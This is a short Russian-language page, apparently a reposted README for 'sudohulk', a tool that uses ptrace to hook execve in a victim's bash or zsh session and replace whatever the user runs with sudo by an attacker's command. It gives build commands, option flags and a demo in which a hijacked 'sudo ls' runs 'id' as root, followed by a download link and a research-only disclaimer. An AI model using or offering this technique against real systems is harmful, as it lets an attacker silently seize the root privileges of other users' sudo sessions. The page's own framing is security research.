Этот инструмент меняет команду sudo, подключая sysall execve с помощью ptrace, протестирован под bash и zsh

Поддерживаемые архитектуры:

• x86_64
• x86
• arm

Как использовать

 # make

cc -Wall -Wextra -O2 -c -o bin/sh_remotedata.o src/sh_remotedata.c

cc -Wall -Wextra -O2 -c -o bin/sh_string.o src/sh_string.c

cc -Wall -Wextra -O2 -c -o bin/sudohulk.o src/sudohulk.c

cc -Wall -Wextra -O2 -o sudohulk bin/sh_remotedata.o bin/sh_string.o bin/sudohulk.o

$ ./sudohulk

sudohulk [-qdk] PID COMMAND [ARGS]



Options:

-q quit when change a command

-d run in background

-k keep original command line (appending to new) 

Заметки

PID = bash или zsh pid

Чтобы присоединить текущую сессию, используйте -d, например:

 # ./sudohulk -qd $$ id 

running in background, pid:20899

 # sudo ls -lah

[sudo] senha para mmxm:

uid=0(root) gid=0(root) grupos=0(root) 

Демо

Скачать Sudohulk

¯_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.